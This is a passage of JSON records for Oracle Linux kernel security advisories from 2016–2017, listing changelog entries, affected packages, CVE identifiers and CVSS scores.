balloon: check the number of available pages in leak balloon (David Hildenbrand) [1417194 1401615]\n- [infiniband] ib/rdmavt: Only put mmap_info ref if it exists (Jonathan Toppins) [1417191 1391299]\n- [x86] kvm: x86: make lapic hrtimer pinned (Luiz Capitulino) [1416373 1392593]\n- [kernel] sched/nohz: Fix affine unpinned timers mess (Luiz Capitulino) [1416373 1392593]\n- [kernel] nohz: Affine unpinned timers to housekeepers (Luiz Capitulino) [1416373 1392593]\n- [kernel] tick-sched: add housekeeping_mask cpumask (Luiz Capitulino) [1416373 1392593]\n- [x86] platform/uv/bau: Add UV4-specific functions (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Fix payload queue setup on UV4 hardware (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Disable software timeout on UV4 hardware (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Populate ->uvhub_version with UV4 version information (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Use generic function pointers (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Add generic function pointers (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Convert uv_physnodeaddr() use to uv_gpa_to_offset() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up pq_init() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up and update printks (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up vertical alignment (Frank Ramsay) [1414715 1386692]\n- [virtio] virtio-pci: alloc only resources actually used (Laurent Vivier) [1413093 1375153]\n- [net] avoid signed overflows for SO_{SND|RCV}BUFFORCE (Sabrina Dubroca) [1412473 1412474] {CVE-2016-9793}\n- [netdrv] sfc: clear napi_hash state when copying channels (Jarod Wilson) [1401461 1394304]\n- [lib] mpi: Fix NULL ptr dereference in mpi_powm() (Mateusz Guzik) [1398457 1398458] {CVE-2016-8650}\n- [scsi] lpfc: Fix eh_deadline setting for sli3 adapters (Ewan Milne) [1430687 1366564]\n- [md] dm round robin: revert 'use percpu 'repeat_count' and 'current_path'' (Mike Snitzer) [1430689 1422567]\n- [md] dm round robin: do not use this_cpu_ptr() without having preemption disabled (Mike Snitzer) [1430689 1422567]\n- Revert: [x86] Handle non enumerated CPU after physical hotplug (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] smp: Don't try to poke disabled/non-existent APIC (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] smpboot: Init apic mapping before usage (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] revert 'perf/uncore: Disable uncore on kdump kernel' (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] perf/x86/intel/uncore: Fix hardcoded socket 0 assumption in the Haswell init code (Prarit Bhargava) [1426633 1373738]\n[3.10.0-514.15.1]\n- [net] vxlan: fix oops in dev_fill_metadata_dst (Paolo Abeni) [1427847 1423068]\n- [x86] perf/x86/intel/uncore: Fix hardcoded socket 0 assumption in the Haswell init code (Prarit Bhargava) [1426633 1373738]\n- [x86] revert 'perf/uncore: Disable uncore on kdump kernel' (Prarit Bhargava) [1426633 1373738]\n- [x86] smpboot: Init apic mapping before usage (Prarit Bhargava) [1426633 1373738]\n- [x86] smp: Don't try to poke disabled/non-existent APIC (Prarit Bhargava) [1426633 1373738]\n- [x86] Handle non enumerated CPU after physical hotplug (Prarit Bhargava) [1426633 1373738]\n- [x86] perf/x86: Fix NMI measurements (Jiri Olsa) [1425804 1405101]\n- [x86] Warn when NMI handlers take large amounts of time (Jiri Olsa) [1425804 1405101]\n- [nvme] apply DELAY_BEFORE_CHK_RDY quirk at probe time too (Gustavo Duarte) [1423439 1409122]\n- [crypto] qat - zero esram only for DH85x devices (Neil Horman) [1422575 1382849]\n- [crypto] qat - fix bar discovery for c62x (Neil Horman) [1422575 1382849]\n- [fs] xfs: remove racy hasattr check from attr ops (Brian Foster) [1421202 1395538]\n- [fs] dlm: free workqueues after the connections (Marcelo Leitner) [1421197 1383710]\n- [netdrv] igb: re-assign hw address pointer on reset after PCI error (Gustavo Duarte) [1419459 1413043]\n- [kernel] timekeeping: Increment clock_was_set_seq in timekeeping_init() (Prarit Bhargava) [1418947 1409214]\n- [kernel] timekeeping: Use timekeeping_update() instead of memcpy() (Prarit Bhargava) [1418947 1409214]\n- [fs] libceph: no need to drop con->mutex for ->get_authorizer() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: drop len argument of *verify_authorizer_reply() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: verify authorize reply on connect (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: no need for GFP_NOFS in ceph_monc_init() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: stop allocating a new cipher on every crypto request (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: uninline ceph_crypto_key_destroy() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: remove now unused ceph_*{en, de}crypt*() functions (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: switch ceph_x_decrypt() to ceph_crypt() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: switch ceph_x_encrypt() to ceph_crypt() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: tweak calcu_signature() a little (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: rename and align ceph_x_authorizer::reply_buf (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: introduce ceph_crypt() for in-place en/decryption (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: introduce ceph_x_encrypt_offset() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: old_key in process_one_ticket() is redundant (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: ceph_x_encrypt_buflen() takes in_len (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: Remove unnecessary ivsize variables (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: Use skcipher (Ilya Dryomov) [1418316 1408170]\n- [scsi] scsi_lib: correctly retry failed zero length REQ_TYPE_FS commands (Ewan Milne) [1417923 1403849]\n- [netdrv] ibmvnic: Start completion queue negotiation at server-provided optimum values (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: Fix missing brackets in init_sub_crq_irqs (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: Fix releasing of sub-CRQ IRQs in interrupt context (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: Update MTU after device initialization (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: Fix GFP_KERNEL allocation in interrupt context (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: fix error return code in ibmvnic_probe() (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: convert to use simple_open() (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: Handle backing device failover and reinitialization (Steve Best) [1418309 1403692]\n- [tools] perf ppc64le: Fix build failure when libelf is not present (Jiri Olsa) [1414710 1376534]\n- [tools] perf probe ppc64le: Fix probe location when using DWARF (Jiri Olsa) [1414710 1376534]\n- [tools] perf probe: Add function to post process kernel trace events (Jiri Olsa) [1414710 1376534]\n- [tools] perf symbols: Fix kallsyms perf test on ppc64le (Jiri Olsa) [1414710 1376534]\n- [tools] perf powerpc: Fix kprobe and kretprobe handling with kallsyms on ppc64le (Jiri Olsa) [1414710 1376534]\n- [netdrv] bnx2x: Use the correct divisor value for PHC clock readings (Michal Schmidt) [1413996 1175585]\n- [fs] seq_file: reset iterator to first record for zero offset (Miklos Szeredi) [1413681 1386642]\n[3.10.0-514.14.1]\n- [net] dccp: fix freeing skb too early for IPV6_RECVPKTINFO (Hannes Frederic Sowa) [1423462 1423463] {CVE-2017-6074}\n- [net] sctp: check af before verify address in sctp_addr_id2transport (Xin Long) [1419837 1414389]\n- [net] sctp: sctp_addr_id2transport should verify the addr before looking up assoc (Xin Long) [1419837 1414389]\n[3.10.0-514.13.1]\n- [fs] gfs2: Reduce contention on gfs2_log_lock (Robert S Peterson) [1422380 1406850]\n- [fs] gfs2: Inline function meta_lo_add (Robert S Peterson) [1422380 1406850]\n- [fs] gfs2: Switch tr_touched to flag in transaction (Robert S Peterson) [1422380 1406850]\n- [fs] xfs: ioends require logically contiguous file offsets (Brian Foster) [1421203 1398005]\n- [fs] xfs: don't chain ioends during writepage submission (Brian Foster) [1421203 1398005]\n- [fs] xfs: factor mapping out of xfs_do_writepage (Brian Foster) [1421203 1398005]\n- [fs] xfs: xfs_cluster_write is redundant (Brian Foster) [1421203 1398005]\n- [fs] xfs: Introduce writeback context for writepages (Brian Foster) [1421203 1398005]\n- [fs] xfs: remove xfs_cancel_ioend (Brian Foster) [1421203 1398005]\n- [fs] xfs: remove nonblocking mode from xfs_vm_writepage (Brian Foster) [1421203 1398005]\n- [fs] mm/filemap.c: make global sync not clear error status of individual inodes (Brian Foster) [1421203 1398005]\n[3.10.0-514.12.1]\n- [fs] fscache: Fix dead object requeue (David Howells) [1420737 1415402]\n[3.10.0-514.11.1]\n- [scsi] qla2xxx: Get mutex lock before checking optrom_state (Chad Dupuis) [1418317 1408387]\n- [mm] memcontrol: do not recurse in direct reclaim (Rik van Riel) [1417192 1397330]", "edition": 3, "reporter": "Oracle", "published": "2017-04-12T00:00:00", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8650", "CVE-2017-6074", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2017-04-12T00:00:00", "id": "ELSA-2017-0933", "href": "http://linux.oracle.com/errata/ELSA-2017-0933.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:46:53", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "x86_64", "packageFilename": "python-perf-3.10.0-514.16.1.0.1.el7.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-devel-3.10.0-514.16.1.0.1.el7.x86_64.rpm", "packageName": "kernel-tools-libs-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "noarch", "packageFilename": "kernel-doc-3.10.0-514.16.1.0.1.el7.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "x86_64", "packageFilename": "kernel-headers-3.10.0-514.16.1.0.1.el7.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "x86_64", "packageFilename": "kernel-debug-devel-3.10.0-514.16.1.0.1.el7.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-3.10.0-514.16.1.0.1.el7.x86_64.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "x86_64", "packageFilename": "kernel-debug-3.10.0-514.16.1.0.1.el7.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "x86_64", "packageFilename": "kernel-3.10.0-514.16.1.0.1.el7.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "x86_64", "packageFilename": "kernel-devel-3.10.0-514.16.1.0.1.el7.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "src", "packageFilename": "kernel-3.10.0-514.16.1.0.1.el7.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-3.10.0-514.16.1.0.1.el7.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-3.10.0-514.16.1.0.1.el7.x86_64.rpm", "packageName": "kernel-tools-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.0.1.el7", "arch": "x86_64", "packageFilename": "perf-3.10.0-514.16.1.0.1.el7.x86_64.rpm", "packageName": "perf", "operator": "lt"}], "description": "- [3.10.0-514.16.1.0.1.el7.OL7]\n- [ipc] ipc/sem.c: bugfix for semctl(,,GETZCNT) (Manfred Spraul) [orabug 22552377]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel (olkmod_signing_key.x509)(alexey.petrenko@oracle.com)\n- Update x509.genkey [bug 24817676]\n[3.10.0-514.16.1.el7]\n- [tty] n_hdlc: get rid of racy n_hdlc.tbuf ('Herton R. Krzesinski') [1429919 1429920] {CVE-2017-2636}\n- [md] dm rq: cope with DM device destruction while in dm_old_request_fn() (Mike Snitzer) [1430334 1412854]\n- [fs] nfs: Fix inode corruption in nfs_prime_dcache() (Benjamin Coddington) [1429514 1416532]\n- [fs] nfs: Don't let readdirplus revalidate an inode that was marked as stale (Benjamin Coddington) [1429514 1416532]\n- [block] Copy a user iovec if it includes gaps (Jeff Moyer) [1429508 1421263]\n- [kernel] percpu-refcount: fix reference leak during percpu-atomic transition (Jeff Moyer) [1429507 1418333]\n- [powerpc] eeh: eeh_pci_enable(): fix checking of post-request state (Steve Best) [1425538 1383670]\n- [s390] mm: handle PTE-mapped tail pages in fast gup (Hendrik Brueckner) [1423438 1391532]\n- [net] skbuff: Fix skb checksum partial check (Lance Richardson) [1422964 1411480]\n- [net] skbuff: Fix skb checksum flag on skb pull (Lance Richardson) [1422964 1411480]\n- [security] selinux: fix off-by-one in setprocattr (Paul Moore) [1422368 1422369] {CVE-2017-2618}\n- [virtio] balloon: check the number of available pages in leak balloon (David Hildenbrand) [1417194 1401615]\n- [infiniband] ib/rdmavt: Only put mmap_info ref if it exists (Jonathan Toppins) [1417191 1391299]\n- [x86] kvm: x86: make lapic hrtimer pinned (Luiz Capitulino) [1416373 1392593]\n- [kernel] sched/nohz: Fix affine unpinned timers mess (Luiz Capitulino) [1416373 1392593]\n- [kernel] nohz: Affine unpinned timers to housekeepers (Luiz Capitulino) [1416373 1392593]\n- [kernel] tick-sched: add housekeeping_mask cpumask (Luiz Capitulino) [1416373 1392593]\n- [x86] platform/uv/bau: Add UV4-specific functions (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Fix payload queue setup on UV4 hardware (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Disable software timeout on UV4 hardware (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Populate ->uvhub_version with UV4 version information (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Use generic function pointers (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Add generic function pointers (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Convert uv_physnodeaddr() use to uv_gpa_to_offset() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up pq_init() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up and update printks (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up vertical alignment (Frank Ramsay) [1414715 1386692]\n- [virtio] virtio-pci: alloc only resources actually used (Laurent Vivier) [1413093 1375153]\n- [net] avoid signed overflows for SO_{SND|RCV}BUFFORCE (Sabrina Dubroca) [1412473 1412474] {CVE-2016-9793}\n- [netdrv] sfc: clear napi_hash state when copying channels (Jarod Wilson) [1401461 1394304]\n- [lib] mpi: Fix NULL ptr dereference in mpi_powm() (Mateusz Guzik) [1398457 1398458] {CVE-2016-8650}\n- [scsi] lpfc: Fix eh_deadline setting for sli3 adapters (Ewan Milne) [1430687 1366564]\n- [md] dm round robin: revert 'use percpu 'repeat_count' and 'current_path'' (Mike Snitzer) [1430689 1422567]\n- [md] dm round robin: do not use this_cpu_ptr() without having preemption disabled (Mike Snitzer) [1430689 1422567]\n- Revert: [x86] Handle non enumerated CPU after physical hotplug (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] smp: Don't try to poke disabled/non-existent APIC (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] smpboot: Init apic mapping before usage (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] revert 'perf/uncore: Disable uncore on kdump kernel' (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] perf/x86/intel/uncore: Fix hardcoded socket 0 assumption in the Haswell init code (Prarit Bhargava) [1426633 1373738]", "edition": 4, "reporter": "Oracle", "published": "2017-04-13T00:00:00", "title": "1 ", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "modified": "2017-04-13T00:00:00", "id": "ELSA-2017-0933-1", "href": "http://linux.oracle.com/errata/ELSA-2017-0933-1.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:39:30", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.1.el6uek", "arch": "src", "packageFilename": "kernel-uek-3.8.13-118.15.1.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.1.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-3.8.13-118.15.1.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-3.8.13-118.15.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-3.8.13-118.15.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.5-3.el6", "arch": "src", "packageFilename": "dtrace-modules-3.8.13-118.15.1.el6uek-0.4.5-3.el6.src.rpm", "packageName": "dtrace-modules-3.8.13-118.15.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-3.8.13-118.15.1.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-3.8.13-118.15.1.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.1.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-3.8.13-118.15.1.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.1.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-3.8.13-118.15.1.el7uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.1.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-3.8.13-118.15.1.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-118.15.1.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-3.8.13-118.15.1.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.1.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-3.8.13-118.15.1.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.5-3.el6", "arch": "x86_64", "packageFilename": "dtrace-modules-3.8.13-118.15.1.el6uek-0.4.5-3.el6.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-118.15.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.1.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-3.8.13-118.15.1.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.1.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-3.8.13-118.15.1.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.5-3.el7", "arch": "src", "packageFilename": "dtrace-modules-3.8.13-118.15.1.el7uek-0.4.5-3.el7.src.rpm", "packageName": "dtrace-modules-3.8.13-118.15.1.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-118.15.1.el7uek", "arch": "src", "packageFilename": "kernel-uek-3.8.13-118.15.1.el7uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.5-3.el7", "arch": "x86_64", "packageFilename": "dtrace-modules-3.8.13-118.15.1.el7uek-0.4.5-3.el7.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-118.15.1.el7uek", "operator": "lt"}], "description": "kernel-uek\n[3.8.13-118.15.1]\n- Revert 'i40e: Set defport behavior for the Main VSI when in promiscuous mode' (Jack Vogel) [Orabug: 22683573] \n- mlx4: avoid multiple free on id_map_ent (Wengang Wang) \n- xen-netfront: cast grant table reference first to type int (Dongli Zhang) \n- xen-netfront: do not cast grant table reference to signed short (Dongli Zhang) \n- RDS: Drop the connection as part of cancel to avoid hangs (Avinash Repaka) [Orabug: 25045360] \n- sctp: validate chunk len before actually using it (Marcelo Ricardo Leitner) [Orabug: 25142879] {CVE-2016-9555}\n- mpi: Fix NULL ptr dereference in mpi_powm() [ver #3] (Andrey Ryabinin) [Orabug: 25154098] {CVE-2016-8650} {CVE-2016-8650}", "edition": 3, "reporter": "Oracle", "published": "2016-12-09T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8650", "CVE-2016-9555"], "modified": "2016-12-09T00:00:00", "id": "ELSA-2016-3651", "href": "http://linux.oracle.com/errata/ELSA-2016-3651.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:47:30", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.22.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-61.1.22.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.22.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-61.1.22.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.22.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-61.1.22.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.22.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-4.1.12-61.1.22.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.5.3-2.el6", "arch": "x86_64", "packageFilename": "dtrace-modules-4.1.12-61.1.22.el6uek-0.5.3-2.el6.x86_64.rpm", "packageName": "dtrace-modules-4.1.12-61.1.22.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.5.3-2.el6", "arch": "src", "packageFilename": "dtrace-modules-4.1.12-61.1.22.el6uek-0.5.3-2.el6.src.rpm", "packageName": "dtrace-modules-4.1.12-61.1.22.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.22.el7uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-61.1.22.el7uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.22.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-4.1.12-61.1.22.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.22.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-4.1.12-61.1.22.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.22.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-61.1.22.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.22.el7uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-4.1.12-61.1.22.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.5.3-2.el7", "arch": "src", "packageFilename": "dtrace-modules-4.1.12-61.1.22.el7uek-0.5.3-2.el7.src.rpm", "packageName": "dtrace-modules-4.1.12-61.1.22.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.5.3-2.el7", "arch": "x86_64", "packageFilename": "dtrace-modules-4.1.12-61.1.22.el7uek-0.5.3-2.el7.x86_64.rpm", "packageName": "dtrace-modules-4.1.12-61.1.22.el7uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.22.el6uek", "arch": "src", "packageFilename": "kernel-uek-4.1.12-61.1.22.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.22.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-61.1.22.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.22.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-4.1.12-61.1.22.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "4.1.12-61.1.22.el7uek", "arch": "x86_64", "packageFilename": "kernel-uek-4.1.12-61.1.22.el7uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "4.1.12-61.1.22.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-4.1.12-61.1.22.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}], "description": "kernel-uek\n[4.1.12-61.1.22]\n- ocfs2: fix trans extend while free cached blocks (Junxiao Bi) [Orabug: 25136991] \n- ocfs2: fix trans extend while flush truncate log (Junxiao Bi) [Orabug: 25136991] \n- ocfs2: extend enough credits for freeing one truncate record while replaying truncate records (Xue jiufei) [Orabug: 25136991] \n- mpi: Fix NULL ptr dereference in mpi_powm() [ver #3] (Andrey Ryabinin) [Orabug: 25154096] {CVE-2016-8650} {CVE-2016-8650}\n- mlx4: avoid multiple free on id_map_ent (Wengang Wang) [Orabug: 25159035]\n[4.1.12-61.1.21]\n- NVMe: reduce queue depth as workaround for Samsung EPIC SQ errata (Ashok Vairavan) [Orabug: 25144380] \n- sctp: validate chunk len before actually using it (Marcelo Ricardo Leitner) [Orabug: 25142868] {CVE-2016-9555}\n[4.1.12-61.1.20]\n- rebuild bumping release", "edition": 3, "reporter": "Oracle", "published": "2016-12-07T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, 